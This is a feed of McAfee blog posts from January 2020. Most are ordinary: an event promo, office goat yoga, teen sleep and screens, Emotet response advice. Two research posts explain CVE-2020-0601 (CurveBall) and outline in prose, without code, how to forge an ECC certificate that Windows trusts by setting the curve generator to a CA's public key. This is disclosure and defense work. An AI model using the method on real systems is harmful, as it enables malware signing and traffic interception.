Analytics are becoming ubiquitous in the ever-increasing world of data. Often, those analytics are implemented without thorough consideration of the life and the risks of the model employed. This session will explore enabling reproducibility and repeatability in data science, the life cycle of a model, what is missing in typical models of today, and how to ensure the healthy and reliable life of a model.

See You Soon!

There’s a lot to look forward to at RSA 2020, so be sure to stop by booth #N-5745 in the North Hall for demos, theater sessions, and more. Feel free to use code XS0UMCAFE for a free RSAC expo pass. Also, be sure to follow @McAfee for real-time updates from the show throughout the week.

 

The post RSA 2020 – See You There! appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/rsa-2020-see-you-there/feed/ 0
You Bring the Yoga Mat, McAfee Brings the Goats https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/you-bring-the-yoga-mat-mcafee-brings-the-goats/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/you-bring-the-yoga-mat-mcafee-brings-the-goats/#respond Thu, 23 Jan 2020 17:09:29 +0000 /blogs/?p=98219

Yogis are likely familiar with the term vinyasa, but have you heard of caprine vinyasa? Caprine vinyasa elevates your standard yoga practice to a whole new level – with goats! At McAfee, we recognize how beneficial stepping away from our desk can be for both our bodies and minds. Taking time to recharge, reset, and […]

The post You Bring the Yoga Mat, McAfee Brings the Goats appeared first on McAfee Blogs.

]]>

Yogis are likely familiar with the term vinyasa, but have you heard of caprine vinyasa? Caprine vinyasa elevates your standard yoga practice to a whole new level – with goats!

At McAfee, we recognize how beneficial stepping away from our desk can be for both our bodies and minds. Taking time to recharge, reset, and care for our physical and mental health is critical to live our best lives at and away from the office.

To offer our team members a smile-inducing wellness opportunity to practice mindfulness, we brought goats to the office for a yoga session. Why goats? Because animal therapy is known to lower blood pressure, lower anxiety, and increase mental stimulation (this is also why you can bring your dog to the office on Fridays!).

During our goat yoga day, goats climbed on people, nuzzled up next to others, and played with each other across the yoga mats. It was nearly impossible to take anything too seriously or to leave without a smile.

“I never imagined I’d be doing yoga with my teammates, let alone with goats climbing on my back! For me, it says a lot about a company that cares enough about employees to offer time away from your desk to practice mindfulness in a unique way. I can’t say I’ll join the regular goat yogis, but it was great experience with my team!”– Jenna, People Analytics

Ready to join a company that cares about your wellbeing (and loves furry friends!), search our openings.

The post You Bring the Yoga Mat, McAfee Brings the Goats appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/you-bring-the-yoga-mat-mcafee-brings-the-goats/feed/ 0
Dangerous Digital Rituals: Could Your Child be Sleep Deprived? https://www.mcafee.com/blogs/consumer/family-safety/dangerous-digital-rituals-is-your-child-sleep-deprived/ https://www.mcafee.com/blogs/consumer/family-safety/dangerous-digital-rituals-is-your-child-sleep-deprived/#respond Sat, 18 Jan 2020 18:00:39 +0000 /blogs/?p=98196 sleep depravation and teens

You’re not wrong if you suspect your kids are spending far more time online than they admit. Where you may be in the dark, however, is that a lot of kids (maybe even yours) are scrolling at night instead of sleeping, a digital ritual that puts their physical and mental health at risk. And, because […]

The post Dangerous Digital Rituals: Could Your Child be Sleep Deprived? appeared first on McAfee Blogs.

]]>
sleep depravation and teens

You’re not wrong if you suspect your kids are spending far more time online than they admit. Where you may be in the dark, however, is that a lot of kids (maybe even yours) are scrolling at night instead of sleeping, a digital ritual that puts their physical and mental health at risk.

And, because sleep and behavior are so intertwined, one family member’s unwise tech habits can quickly spill over and affect the whole family.

Screens over ZZZs

That moody stew your daughter has been dishing up all day or may not be standard teen angst. And the D in math your son brought home for the first time may have little to do with geometric proofs.

While it may not be the first thing that comes to a parent’s mind, sleep deprivation could be a source of a number of family challenges today.

According to a 2019 Common Sense Media study, 68 percent of teens take their devices to their rooms at bedtime, and one-third have the phone with them in bed. Over one-third of those kids and, more than one-fourth of parents admit to waking up to look at their phone at least once a night (usually to check social media or respond to a notification).

What science says

Like water and air, humans need sleep to live. Sleep deprivation over time is a serious condition, especially for children. Medical studies continue to link poor sleep habits to anxiety, reduced cognitive development, obesity, immunity issues, absentmindedness, and impaired judgment. Because depriving the brain of sleep reduces its reaction time, it’s also one of the main causes of road accidents.

How much sleep do they need? The American Academy of Pediatrics recommendations:

  • Children 3-5 should sleep 10 to 13 hours on a regular basis
  • Children 6-12 should sleep 9 to 12 hours on a regular basis
  • Children 13-18 should sleep 8 to 10 hours on a regular basis

Goal: digital responsibility

I recently met a mom in a parenting forum who tackled this very issue by establishing clear ground rules for nighttime device use.

Dana Ahern is the mom of four (ages 7-15) and co-founder (along with husband Adam) of Village Social, a private, safe, “alternative” social network that helps teach kids digital responsibility.

Ahern says establishing ground rules for devices only works if parents stick to them.

“Yes, they [kids] might get mad,” says Ahern. “Yes, they may say they need their phone to listen to music or a meditation app to be able to fall asleep or need the alarm to wake up in the morning. Our solution — get them an Echo Dot or an old fashioned alarm clock radio in place of the phone.”

In the Ahern home, all screens must be shut off at least one hour before bedtime and put on a docking station in the parents’ bedroom. Screen time is tracked via Apple’s Downtime app. And, all homework must be done in the living room (no bedrooms) with an absolute cut-off time of 10 p.m.

Says Ahern, “We’ve found that it’s been relatively easy to get all the kids on this schedule. They don’t fight it. They may, in fact, secretly appreciate knowing we care.”

More ideas to consider:

It’s never “too late” for a good change. Some parents say they’re reluctant to give their kids (especially teens) new technology rules because it’s “too late,” and their kids are too attached to their devices. Even so, with more information linking technology to kids’ mental health, it’s imperative to change course if needed — even if doing so may be difficult.

Reframe the change. Why are kids on their phones all night? Because they want to be and want often overpowers need in this age group. To help kids make tough digital shifts, discuss the personal gains that will result from the change. For instance, consistent quality sleep can help control weight, boost academic and athletic performance, increase energy and immunity levels, reduce drama and conflict, sharpen decision-making, and improve creativity and motivation. In short, quality sleep ignites our superpowers.

Add monitoring muscle. There a number of ways to help keep a child’s screen time on track. One way is to get a monitoring solution. Need to make sure your youngest is only accessing the internet for homework at night? Or limit online game time to 30 minutes a day? Software support could help.

Model good sleep habits. Your kids will be the first ones to call you out if your screen time goes up while they are digitally wasting away. In the same above study, 39 percent of teens said their parents spent too much time on their phones in 2019 (an 11-point jump from 2016).

Any change to your child’s favorite rituals may put a temporary strain on the family dynamic. That’s okay. A little healthy tension, some grumbling, and lingering awkwardness are all side effects of successful digital parenting. Also, remind yourself and your kids as often as you need to that restricting device use — especially at bedtime — isn’t a punishment. It’s a health and safety choice that isn’t negotiable. Translation? Limits equal love.

The post Dangerous Digital Rituals: Could Your Child be Sleep Deprived? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/dangerous-digital-rituals-is-your-child-sleep-deprived/feed/ 0
CurveBall – An Unimaginative Pun but a Devastating Bug https://www.mcafee.com/blogs/other-blogs/mcafee-labs/curveball-an-unimaginative-pun-but-a-devastating-bug/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/curveball-an-unimaginative-pun-but-a-devastating-bug/#respond Sat, 18 Jan 2020 05:49:30 +0000 /blogs/?p=98203

Enterprise customers looking for information on defending against Curveball can find information here. 2020 came in with a bang this year, and it wasn’t from the record-setting number of fireworks on display around the world to celebrate the new year. Instead, just over two weeks into the decade, the security world was rocked by a […]

The post CurveBall – An Unimaginative Pun but a Devastating Bug appeared first on McAfee Blogs.

]]>

Enterprise customers looking for information on defending against Curveball can find information here.

2020 came in with a bang this year, and it wasn’t from the record-setting number of fireworks on display around the world to celebrate the new year. Instead, just over two weeks into the decade, the security world was rocked by a fix for CVE-2020-0601 introduced in Microsoft’s first patch Tuesday of the year. The bug was submitted by the National Security Administration (NSA) to Microsoft, and though initially deemed as only “important”, it didn’t take long for everyone to figure out this bug fundamentally undermines the entire concept of trust that we rely on to secure web sites and validate files. The vulnerability relies on ECC (Elliptic Curve Cryptography), which is a very common method of digitally signing certificates, including both those embedded in files as well as those used to secure web pages. It represents a mathematical combination of values that produce a public and private key for trusted exchange of information. Ignoring the intimate details for now, ECC allows us to validate that files we open or web pages we visit have been signed by a well-known and trusted authority. If that trust is broken, malicious actors can “fake” signed files and web sites and make them look to the average person as if they were still trusted or legitimately signed. The flaw lies in the Microsoft library crypt32.dll, which has two vulnerable functions. The bug is straightforward in that these functions only validate the encrypted public key value, and NOT the parameters of the ECC curve itself. What this means is that if an attacker can find the right mathematical combination of private key and the corresponding curve, they can generate the identical public key value as the trusted certificate authority, whomever that is. And since this is the only value checked by the vulnerable functions, the “malicious” or invalid parameters will be ignored, and the certificate will pass the trust check.

As soon as we caught wind of the flaw, McAfee’s Advanced Threat Research team set out to create a working proof-of-concept (PoC) that would allow us to trigger the bug, and ultimately create protections across a wide range of our products to secure our customers. We were able to accomplish this in a matter of hours, and within a day or two there were the first signs of public PoCs as the vulnerability became better understood and researchers discovered the relative ease of exploitation.

Let’s pause for a moment to celebrate the fact that (conspiracy theories aside) government and private sector came together to report, patch and publicly disclose a vulnerability before it was exploited in the wild. We also want to call out Microsoft’s Active Protections Program, which provided some basic details on the vulnerability allowing cyber security practitioners to get a bit of a head start on analysis.

The following provides some basic technical detail and timeline of the work we did to analyze, reverse engineer and develop working exploits for the bug.  This blog focuses primarily on the research efforts behind file signing certificates.  For a more in-depth analysis of the web vector, please see this post.

Creating the proof-of-concept

The starting point for simulating an attack was to have a clear understanding of where the problem was. An attacker could forge an ECC root certificate with the same public key as a Microsoft ECC Root CA, such as the ECC Product Root Certificate Authority 2018, but with different “parameters”, and it would still be recognized as a trusted Microsoft CA. The API would use the public key to identify the certificate but fail to verify that the parameters provided matched the ones that should go with the trusted public key.

There have been many instances of cryptography attacks that leveraged failure of an API to validate parameters (such as these two) and attackers exploiting this type of vulnerability. Hearing about invalid parameters should raise a red flag immediately.

To minimize effort, an important initial step is to find the right level of abstraction and details we need to care about. Minimal details on the bug refer to public key and curve parameters and nothing about specific signature details, so likely reading about how to generate public/private key in Elliptical Curve (EC) cryptography and how to define a curve should be enough.

The first part of this Wikipedia article defines most of what we need to know. There’s a point G that’s on the curve and is used to generate another point. To create a pair of public/private keys, we take a random number k (the private key) and multiply it by G to get the public key (Q). So, we have Q = k*G. How this works doesn’t really matter for this purpose, so long as the scalar multiplication behaves as we’d expect. The idea here is that knowing Q and G, it’s hard to recover k, but knowing k and G, it’s very easy to compute Q.

Rephrasing this in the perspective of the bug, we want to find a new k’ (a new private key) with different parameters (a new curve, or maybe a new G) so that the ECC math gives the same Q back. The easiest solution is to consider a new generator G’ that is equal to our target public key (G’= Q). This way, with k’=1 (a private key equal to 1) we get k’G’ = Q which would satisfy the constraints (finding a new private key and keeping the same public key).

The next step is to verify if we can actually specify a custom G’ while specifying the curve we want to use. Microsoft’s documentation is not especially clear about these details, but OpenSSL, one of the most common cryptography libraries, has a page describing how to generate EC key pairs and certificates. The following command shows the standard parameters of the P384 curve, the one used by the Microsoft ECC Root CA.

Elliptic Curve Parameter Values

We can see that one of the parameters is the Generator, so it seems possible to modify it.

Now we need to create a new key pair with explicit parameters (so all the parameters are contained in the key file, rather than just embedding the standard name of the curve) and modify them following our hypothesis. We replace the Generator G’ by the Q from Microsoft Certificate, we replace the private key k’ by 1 and lastly, we replace the public key Q’ of the certificate we just generated by the Q of the Microsoft certificate.

To make sure our modification is functional, and the modified key is a valid one, we use OpenSSL to sign a text file and successfully verify its signature.

Signing a text file and verifying the signature using the modified key pair (k’=1, G’=Q, Q’=Q)

From there, we followed a couple of tutorials to create a signing certificate using OpenSSL and signed custom binaries with signtool. Eventually we’re greeted with a signed executable that appeared to be signed with a valid certificate!

Spoofed/Forged Certificate Seemingly Signed by Microsoft ECC Root CA

Using Sysinternal’s SigChecker64.exe along with Rohitab’s API Monitor (which, ironically is on a site not using HTTPS) on an unpatched system with our PoC, we can clearly see the vulnerability in action by the return values of these functions.

Rohitab API Monitor – API Calls for Certificate Verification

Industry-wide vulnerabilities seem to be gaining critical mass and increasing visibility even to non-technical users. And, for once, the “cute” name for the vulnerability showed up relatively late in the process. Visibility is critical to progress, and an understanding and healthy respect for the potential impact are key factors in whether businesses and individuals quickly apply patches and dramatically reduce the threat vector. This is even more essential with a bug that is so easy to exploit, and likely to have an immediate exploitation impact in the wild.

McAfee Response

McAfee aggressively developed updates across its entire product lines.  Specific details can be found here.

 

The post CurveBall – An Unimaginative Pun but a Devastating Bug appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/curveball-an-unimaginative-pun-but-a-devastating-bug/feed/ 0
What CVE-2020-0601 Teaches Us About Microsoft’s TLS Certificate Verification Process https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-cve-2020-0601-teaches-us-about-microsofts-tls-certificate-verification-process/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-cve-2020-0601-teaches-us-about-microsofts-tls-certificate-verification-process/#respond Fri, 17 Jan 2020 21:25:55 +0000 /blogs/?p=98190

By: Jan Schnellbächer and Martin Stecher, McAfee Germany GmbH This week security researches around the world were very busy working on Microsoft’s major crypto-spoofing vulnerability (CVE-2020-0601) otherwise known as Curveball. The majority of research went into attacks with malicious binaries that are signed with a spoofed Certificate Authority (CA) which unpatched Win10 systems would in […]

The post What CVE-2020-0601 Teaches Us About Microsoft’s TLS Certificate Verification Process appeared first on McAfee Blogs.

]]>

By: Jan Schnellbächer and Martin Stecher, McAfee Germany GmbH

This week security researches around the world were very busy working on Microsoft’s major crypto-spoofing vulnerability (CVE-2020-0601) otherwise known as Curveball. The majority of research went into attacks with malicious binaries that are signed with a spoofed Certificate Authority (CA) which unpatched Win10 systems would in turn trust. The other attack vector —HTTPS-Server-Certificates— got less attention until Saleem Rashid posted a first working POC on Twitter, followed by Kudelski Security and “Ollypwn” who published more details  on how the Proof-Of-Concepts are created.

McAfee Security experts followed the same approach and were able to  reproduce the attack.  In addition, they confirmed that users  browsing via unpatched Windows-Systems were protected provided their clients were deployed behind McAfee’s Web Gateway or Web Gateway Cloud Service and running the certificate verification policy. This is typically part of the SSL Scanner but is also available as a separate policy even if no SSL inspection should be done (see KB92322 for details).

In our first attempt, we used the spoofed version of a CA from the Windows Root CA Trust store to sign a server certificate and then only provided the server certificate when the HTTPS connection wanted to be established. That attempt failed and we assumed that we did not get the spoofing right. Then we learned that the spoofed CA actually needs to be included together with the server certificate and that chain of certificates is then accepted by an unpatched Windows 10 system.

But why is that? By sending the spoofed version, it becomes obvious that this is not the same certificate that exists in the trust store and should be denied immediately. Also, in the beginning, we tried hard to make the spoofed CA as similar to the original CA as possible (same common name, same serial number, etc.). In fact, we found that none of that plays any role when Windows does the certificate verification.

A good indication of what’s happening behind the scenes, is already provided by Windows’ own certificate information dialogs. We started with the “UserTrust ECC Certificate” in the Windows Trusted Root CA catalog which carries the friendly name “Sectigo ECC”. Then we created a spoofed version of that CA and gave it a new common name “EVIL CA”. With that, it was easy to set up a new test HTTPS server in our test network and manipulate the routing of a test client so that it would reach our server when the user types https://www.google.com into the browser. The test server  was presenting SSL session information for debugging purposes instead of any Google content.

When you click onto the lock symbol, the browser tells you that the connection has been accepted as valid and trusted and that the original “Sectigo ECC” root CA  had signed the server certificate.

But we know that this was not the case, and in contrast to our own original assumptions, Windows did not even verify the server certificate against the “Sectigo ECC. It compared it against the included spoofed CA. That can be seen, when you do another click to “View certificates”:

As the screenshot shows, we are still in the same SSL session (the master key is the same on both pictures), but now Windows is showing that the (correct) issuer of the server certificate is our spoofed “EVIL CA”.

Windows’ cryptographic signature verification works correctly

The good news is that Windows does not really have an issue with the cryptographic functions to validate the signature of an elliptic curve certificate! That verification works correctly. The problem is how the trust chain comparison is done to prove that the chain of signatures is correctly ending in the catalog of trusted root CAs.

We assumed that an attack would use a signing CA that points to an entry in the trusted Root CA store and verification of the signature would be limited so that the signature would be accepted although it was not signed with that original CA but a spoofed CA. But in fact, Windows is validating the embedded certificate chain — which is perfectly valid and cryptographically correct— and then matches the signing certificate with the entries in the trusted Root CA store. This last piece is what has not been done correctly (prior to the system patch).

Our tests revealed that Windows does not even try to match the certificates. It only matches the public key of the certificates (and a few more comparisons and checks) – making the comparison incomplete. That was the actual bug of this vulnerability (at least as web site certificates are concerned).

The Trusted Certificate Store is actually a Trusted Public Key Store

When we talk about the trust chain in SSL/TLS communication, we mean a chain of certificates that are signed by a CA until we reach a trusted Root CA. But Microsoft appears to ignore the certificates for the most part and manages a chain of the public keys of certificates. The comparison is also comparing the algorithm. At a time where only RSA certificates were used, that was sufficient. It was not possible for an attacker to create his own key pair with the same public key as the trusted certificate. With the introduction of Elliptic Curve Cryptography (ECC), Microsoft’s comparison of only the algorithm and the public key is failing. It is failing to also compare the characteristics of the elliptic curve itself. Without this additional parameter, it simply creates the same public key (curve point) again on a different curve. This is what was fixed on Patch-Tuesday — the comparison of the public key information now includes the curve characteristics.

This screenshot shows that the original certificate on the right side and the spoofed CA on the left are very different. Different common name, and a totally different elliptic curve (a standard curve for the original CA and a handcrafted for the spoofed version), but the signature seen under the “pub” entry is identical. That has been sufficient to make Windows believe that the embedded spoofed CA was the same as the trusted CA in the certificate store.

Why not comparing certificates by name or serial number?

A different (and maybe more natural) algorithm is to compare certificates by their common name and/or their serial number and whenever you have a match, continue the trust chain and verification with the certificate in the trust store. Why is Windows comparing public keys instead? We can only speculate but the advantage might be for Enterprises who want to swap their certificates without rolling out new root CAs to all client computers. Imagine an organization that maintains its own PKI and installs its own Root CA in the store of trusted certificates. When these companies go through mergers and acquisitions and the company name may change. This would be a good time to also change the common name of your signing certificate. However, if you do not have a good way to remote maintain all clients and update the certificate in the trusted store, it is easier to tell the Cooperation to use the original key pair of public and private keys and create a new certificate with that same key pair. The new cert will still match the old cert and no other client update is necessary. Convenient! But Is it secure? At this point it is not really a chain of trusted certificates but a chain of trusted public keys.

We tested whether this could also be mis-used to create a new cert when the old one has expired but that is not the case. After comparing the public keys, Windows is still using the expiration date of the certificate in the trusted store to determine whether the chain is still valid, which is good.

How to harden the process?

The root problem of this approach is that the complete cryptographic verification happens with the embedded certificates and only after verification the match against the entry in the trusted Root CAs store is done. That always has room for oversights and incomplete matching algorithms as we have seen with this vulnerability. A safe approach is to first match the certificates (or public keys), find the corresponding entry in the Trusted Root CA store and then use that trusted certificate to continue the signature verification. That way, the verification fails on the safe side and broken chains can be identified easily.

We do not know whether that has been changed with the patched Windows version or if only the matching algorithm has been improved. If not, we recommend reviewing this alternative approach and further hardening the implementation in the operating system and browser.

The post What CVE-2020-0601 Teaches Us About Microsoft’s TLS Certificate Verification Process appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-cve-2020-0601-teaches-us-about-microsofts-tls-certificate-verification-process/feed/ 0
McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability https://www.mcafee.com/blogs/enterprise/endpoint-security/mcafees-defenses-against-microsofts-cryptoapi-vulnerability/ https://www.mcafee.com/blogs/enterprise/endpoint-security/mcafees-defenses-against-microsofts-cryptoapi-vulnerability/#respond Fri, 17 Jan 2020 14:35:18 +0000 /blogs/?p=98179

Microsoft made news this week with the widely reported vulnerability known as CVE-2020-0601, which impacts the Windows CryptoAPI. This highly critical vulnerability allows an attacker to fake both signatures and digital certificates. The attacker would use spoofed Elliptic-curve cryptography (ECC) certificates for signing malicious files to evade detection or target specific hostnames to evade browser security alerts by […]

The post McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability appeared first on McAfee Blogs.

]]>

Microsoft made news this week with the widely reported vulnerability known as CVE-2020-0601, which impacts the Windows CryptoAPI. This highly critical vulnerability allows an attacker to fake both signatures and digital certificates. The attacker would use spoofed Elliptic-curve cryptography (ECC) certificates for signing malicious files to evade detection or target specific hostnames to evade browser security alerts by making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

The CVE-2020-0601 vulnerability reportedly impacts Windows 10, Windows Server 2019, and Windows Server 2016 OS versions. The Microsoft patch (below) addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. 

Since it was identified, a public exploit POC was posted that will allow any malicious party to use this exploit to sign executables as a third party. Additionally, the bug could intercept and fake secure web (HTTPS) connections and has the power to fake signatures for files and emails.

Details on McAfee’s enterprise defenses against this vulnerability are outlined below and available in knowledge base article KB92322. Additional products may be updated with extra countermeasures and defenses as our research uncovers more. We will continue to update the articles.

What can you do to protect yourself?

The bug is considered to be highly critical. It is important for everyone running a vulnerable operating system to apply the security update provided by Microsoft.

Large organizations who follow 15/30/60-day patch cycles should consider making an exception and apply the patches as soon as possible.

Microsoft’s security patches are available here. The event is serious enough that the NSA has released its own security advisory, with mitigation information and how to detect exploitation, and urging IT staff to expedite the installation of Microsoft’s security updates. The Cybersecurity and Infrastructure Security Agency (CISA) at the Department of Homeland Security (DHS) have also released an emergency directive to alert the US private sector and government entities about the need to install the latest Windows OS fixes sooner rather than later.

How are McAfee Customers Protected?

McAfee products can help detect and prevent the exploit from executing on your systems.  Specifically:

McAfee Endpoint Security (ENS)

McAfee can help protect against this vulnerability with a signature set to help detect fraudulently signed files.

Threat Intelligence Exchange (TIE)

TIE can help to identify file signing abuse prior to patching by providing a workflow to pivot into spoofed CAs and their signed binaries already run in the environment.

McAfee Network Security Platform (IPS)

NSP signatures (Emergency Signature set version 10.8.3.3) will prevent file signing abuse by blocking connections that are using certificates known to be impacted by the vulnerability.

 Web Gateway

File inspection for signature have been implemented in Web Gateway Anti-Malware. Using HTTPs scanning on the Web Gateway will move the validity checks for certificates from endpoints to the gateway and provide a central HTTPS certificate policy that is not based on the vulnerable function.

McAfee MVISION EDR

MVISION EDR can detect exploit attempts for this vulnerability on patched systems. In order to identify devices that have been involved recently in an exploit attempt, the customer can use the Real Time Search dashboard to execute a query using an NSACryptEvents collector.

McAfee Active Response (MAR)

McAfee Active Response has the ability to detect exploit attempts for this vulnerability. To identify devices that have been involved recently in an exploit attempt, the customer can use Active Response Catalog to create a custom collector and Active Response Search to execute a query using that collector. McAfee Active Response (MAR) users can also do a real time query with the NSACryptEvents collector.

McAfee Enterprise Security Manager (SIEM)

McAfee Enterprise Security Manager can detect exploit attempts for this vulnerability on patched systems by detecting events routed to SIEM using new signatures available via the normal content update process. (Refer to the knowledge-base article outlining how to update EMS rules.)

New rules have been uploaded to the content server with new signature ID’s and descriptions for these events. Customers can use these to create alarms.

Full details on how to access these solutions are outlined in knowledge-base article KB92322. Additional products may be updated with additional countermeasures and defenses as our research uncovers more. We will continue to update knowledge-base article KB92322 with any additional recommendations or findings.

The post McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/endpoint-security/mcafees-defenses-against-microsofts-cryptoapi-vulnerability/feed/ 0
What Is the CurveBall Bug? Here’s What You Need to Know  https://www.mcafee.com/blogs/consumer/what-is-the-curveball-bug/ https://www.mcafee.com/blogs/consumer/what-is-the-curveball-bug/#comments Fri, 17 Jan 2020 02:59:12 +0000 /blogs/?p=98176

Today, it was announced that researchers published proof of concept code (essentially, an exercise to determine if an idea is a reality) that exploits a recently patched vulnerability in the Microsoft Windows operating system (OS). The vulnerability, named CurveBall, impacts the components that handle the encryption and decryption mechanisms in the Windows OS, which inherently help protect sensitive information. How It Works  So how does this vulnerability work, exactly? For starters, unsafe sites or files can disguise themselves as legitimate ones.  When this vulnerability is exploited, CurveBall could allow […]

The post What Is the CurveBall Bug? Here’s What You Need to Know  appeared first on McAfee Blogs.

]]>

Today, it was announced that researchers published proof of concept code (essentially, an exercise to determine if an idea is a reality) that exploits a recently patched vulnerability in the Microsoft Windows operating system (OS). The vulnerability, named CurveBall, impacts the components that handle the encryption and decryption mechanisms in the Windows OS, which inherently help protect sensitive information.

How It Works 

So how does this vulnerability work, exactly? For starters, unsafe sites or files can disguise themselves as legitimate ones.  When this vulnerability is exploited, CurveBall could allow a hacker to launch man-in-the-middle attacks, which is when a hacker secretly relays and possibly alters the communications between two unsuspecting users. Additionally, a hacker could use the vulnerability to intercept and fake secure web (HTTPS) connections or fake signatures for files and emails. Essentially, this means a hacker could place harmful files or run undetected malware on a system.

What It Impacts 

There are still questions surrounding what exactly is impacted by CurveBall, and subsequently what could be affected by the new code. According to Microsoft, CurveBall impacts Windows 10, Windows Server 2019, and Windows Server 2016 OS versions. With three popular operating systems afflicted, and the possibility to bypass basic security safeguards, patching is more important than ever. For unpatched systems, malware that takes advantage of this vulnerability may go undetected and slip past security features.

How to Stay Protected 

Now, what should you do to protect yourself from the CurveBall vulnerability? At McAfee, we are in the process of deploying an update to keep our loyal users secure from this vulnerability. In the meantime, however, there are a few things you should do to do to protect yourself. Start by following these tips:

  • Update your Windows 10 OS to get the latest security patches.
  • Use caution when surfing the web.
  • Only open files and emails from trusted sources.
  • Update your browsers to the latest versions if available.
  • If you are an enterprise customer, please reference KB92329 for information on McAfee enterprise defense from this vulnerability.
  • Contact McAfee Support if you have any further questions or need assistance.

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What Is the CurveBall Bug? Here’s What You Need to Know  appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/what-is-the-curveball-bug/feed/ 1
How Frankfurt Stopped Emotet In Its Tracks https://www.mcafee.com/blogs/enterprise/how-frankfurt-stopped-emotet-in-its-tracks/ https://www.mcafee.com/blogs/enterprise/how-frankfurt-stopped-emotet-in-its-tracks/#respond Wed, 15 Jan 2020 16:00:07 +0000 /blogs/?p=98085

During a time when ransomware continues to bring governments around the world to a halt, one city has turned the tables, by bringing their government to a halt pre-emptively to prevent ransomware. According to ZDNet, in late December, Frankfurt, Germany—one of the world’s biggest financial hubs—reportedly shut down its IT network after its anti-malware platform […]

The post How Frankfurt Stopped Emotet In Its Tracks appeared first on McAfee Blogs.

]]>

During a time when ransomware continues to bring governments around the world to a halt, one city has turned the tables, by bringing their government to a halt pre-emptively to prevent ransomware.

According to ZDNet, in late December, Frankfurt, Germany—one of the world’s biggest financial hubs—reportedly shut down its IT network after its anti-malware platform identified an Emotet infection. The reported malware gained entry when an employee clicked on a malicious email that had been spoofed to look as though it came from a city authority.

Rather than risk further spread and subsequent, more damaging infection, government authorities made the difficult decision to halt the IT network until the Emotet threat was resolved. In so doing, all of the city’s IT functions were shut down for over 24 hours—including employee email, essential apps, and all services offered through the Frankfurt.de webpage. The move paid off, however—as IT department spokesman Gunter Marr told Journal Frankfurt, no lasting damage had occurred.

“In my opinion, Frankfurt made a very brave—probably not easy—decision to shut down the network to eradicate their Emotet infection,” said John Fokker, Head of Cyber Investigations for McAfee Advanced Threat Research. “Emotet infection is a precursor to Ryuk ransomware, so I think they dodged the proverbial bullet.”

The Emotet-Ransomware Connection

In many cases, the first sign of ransomware is the ransom demand itself, alerting you that you’ve been infected and asking you to pay up. The Emotet malware works a bit differently in that it is not, in itself, ransomware. Instead, it functions like the key to a door: Emotet infects the system, and once the system is “open,” access to the Emotet-infected network can be sold to ransomware groups and other cybercriminals, who may then utilize stolen credentials and simply “walk in.” In a recent campaign, once Emotet was downloaded, it in turn downloaded the Trickbot trojan from a remote host, which stole credentials and enabled a successful Ryuk ransomware infection.

However, the same multistep process that can deliver two paydays on a single deployment of ransomware is also its Achilles’ Heel. Since getting ransomware from an Emotet infection is generally a two or more-step process, if you can stop or eliminate Emotet at Step 1, the subsequent steps toward a ransomware infection cannot occur.

While Frankfurt’s Emotet infection and the subsequent shutdown led to more than a day’s loss in productivity, massive outages and major disruption, the city should be commended on its quick and level-headed response—had they attempted to preserve business operations or opted to take a wait-and-see approach, a potential ransomware infection could have cost them millions more in lost productivity and threat mitigation.

An Ounce of Prevention …

While Frankfurt was able to intercept the Emotet botnet in time, many others were not—another attack several days before, in a town just north of Frankfurt, resulted in massive disruption when the Emotet malware led to the successful deployment of Ryuk ransomware. In other words, the best and safest way to avoid a similar fate is to prevent an Emotet infection in the first place.

There are several steps you can take to keep Emotet from establishing a stronghold in your network:

  1. Educate Your Employees: The most important step is to educate your employees on how to identify phishing and social engineering attempts. Identify email security best practices, such as hovering over a link to identify the actual destination before clicking on a link, never giving account information over email, and mandating that all suspicious emails be immediately reported.
  2. Patch Vulnerabilities: The Trickbot trojan is frequently delivered as a secondary payload to Emotet. It depends on the Microsoft Windows EternalBlue vulnerability—patching this vulnerability is an important step to securing your network.
  3. Strengthen Your Logins: If Emotet does gain entrance, it can attempt to spread by guessing the login credentials of connected users. By mandating strong passwords and two-factor authentication, you can help limit the spread.
  4. Adopt Strong Anti-Malware Protection, And Ensure It’s Configured Properly: A timely alert from a capable anti-malware system enabled Frankfurt to stop Emotet. Adopting strong endpoint protection such as McAfee Endpoint Security (ENS) is one of the most important steps you can take to help prevent Emotet and other malware. Once it’s in place, you can maximize your protection by performing periodic maintenance and optimizing configurations.

Above all, don’t fall into the trap of thinking it couldn’t happen to you. According to the McAfee Labs Threats Report, ransomware grew by 118% in just the first quarter of 2019, and several new ransomware families were detected. If the spate of recent attacks is any indication, we may see similar trends in Q1 2020.

“The demand for access to large corporate or public sector networks is very high at the moment,” Fokker explained “Ransomware actors are constantly scanning, spearphishing, purchasing access gained from other malware infections, and obtaining log files from info-stealing malware to get a foothold into networks.”

“Every company or institution should be diligent and not ignore even the simplest breach—even if it happened more than a year ago,” Fokker said.

 

 

 

The post How Frankfurt Stopped Emotet In Its Tracks appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/how-frankfurt-stopped-emotet-in-its-tracks/feed/ 0
MITRE ATT&CK™, What’s the Big Idea? https://www.mcafee.com/blogs/enterprise/endpoint-security/mitre-attck-whats-the-big-idea/ https://www.mcafee.com/blogs/enterprise/endpoint-security/mitre-attck-whats-the-big-idea/#respond Tue, 14 Jan 2020 22:09:48 +0000 /blogs/?p=98090

